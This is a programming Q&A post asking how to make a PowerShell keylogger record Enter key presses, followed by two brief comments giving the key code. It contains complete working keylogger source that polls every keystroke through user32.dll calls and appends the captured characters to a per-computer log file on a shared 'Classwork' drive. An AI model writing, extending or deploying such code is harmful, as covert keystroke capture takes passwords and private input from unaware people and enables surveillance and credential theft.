# Adding [ENTER] key into power shell key logger

Tags: powershell

Can any one help me make this key logger recognize someone pressing the (ENTER) key?

## Her is the code

```
function KeyLog {

$virtualkc_sig = @'
[DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)] 
public static extern short GetAsyncKeyState(int virtualKeyCode); 
'@

$kbstate_sig = @'
[DllImport("user32.dll", CharSet=CharSet.Auto)]
public static extern int GetKeyboardState(byte[] keystate);
'@

$mapchar_sig = @'
[DllImport("user32.dll", CharSet=CharSet.Auto)]
public static extern int MapVirtualKey(uint uCode, int uMapType);
'@

$tounicode_sig = @'
[DllImport("user32.dll", CharSet=CharSet.Auto)]
public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[]lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags);
'@

$getKeyState = Add-Type -MemberDefinition $virtualkc_sig -name "Win32GetState" -namespace Win32Functions -passThru
$getKBState = Add-Type -MemberDefinition $kbstate_sig -name "Win32MyGetKeyboardState" -namespace Win32Functions -passThru
$getKey = Add-Type -MemberDefinition $mapchar_sig -name "Win32MyMapVirtualKey" -namespace Win32Functions -passThru
$getUnicode = Add-Type -MemberDefinition $tounicode_sig -name "Win32MyToUnicode" -namespace Win32Functions -passThru

    while ($true) {
        Start-Sleep -Milliseconds 40
        $gotit = ""

        for ($char = 1; $char -le 254; $char++) {
            $vkey = $char
            $gotit = $getKeyState::GetAsyncKeyState($vkey)

            if ($gotit -eq -32767) {

                $l_shift = $getKeyState::GetAsyncKeyState(160)
                $r_shift = $getKeyState::GetAsyncKeyState(161)
                $caps_lock = [console]::CapsLock

                $scancode = $getKey::MapVirtualKey($vkey, $MAPVK_VSC_TO_VK_EX)

                $kbstate = New-Object Byte[] 256
                $checkkbstate = $getKBState::GetKeyboardState($kbstate)

                $mychar = New-Object -TypeName "System.Text.StringBuilder";
                $unicode_res = $getUnicode::ToUnicode($vkey, $scancode, $kbstate, $mychar, $mychar.Capacity, 0)

                if ($unicode_res -gt 0) {
                    $logfile = "W:\1B_Classwork\Logs\$env:computername.log"
                    Out-File -FilePath $logfile -Encoding Unicode -Append -NoNewline -InputObject $mychar.ToString()
                }
            }
        }
    }
}

KeyLog
```

Comment: 13 = ENTER key; i.e. `$getKeyState::GetAsyncKeyState(13)`

Comment: I don't see where I would put that. May you please specify?